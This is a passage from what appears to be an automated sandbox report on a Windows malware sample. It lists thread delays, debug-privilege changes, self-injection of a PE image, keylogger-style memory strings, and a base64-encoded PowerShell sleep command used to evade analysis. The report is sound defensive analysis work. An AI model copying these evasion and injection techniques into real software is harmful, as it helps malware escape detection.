                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1200000
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199662
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199537
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199405
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199200
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1198760
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1198310
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1197900
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1197786
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1197349
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1196761
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1196360
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1196005
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1195758
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1195505
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1194897
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1194753
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1194348
                Source: Qasvjoldkyh.exe, 0000000F.00000002.566195369.0000000000F6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8j
                Source: file.exe, 00000004.00000003.396945802.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000002.609344708.00000000010AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Encrypted powershell cmdline option found
                Source: C:\Users\user\Desktop\file.exeProcess created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\Desktop\file.exeProcess created: Base64 decoded start-sleep -seconds 20Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess created: Base64 decoded start-sleep -seconds 20Jump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: Base64 decoded start-sleep -seconds 20Jump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeMemory written: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeMemory written: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exeJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeJump to behavior
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000004.00000002.618527573.0000000002D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>{Win}{Win}r{Win}
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>{Win}
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>{Win}{Win}
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>{Win}{Win}r{Win}r
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>{Win}{Win}r
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
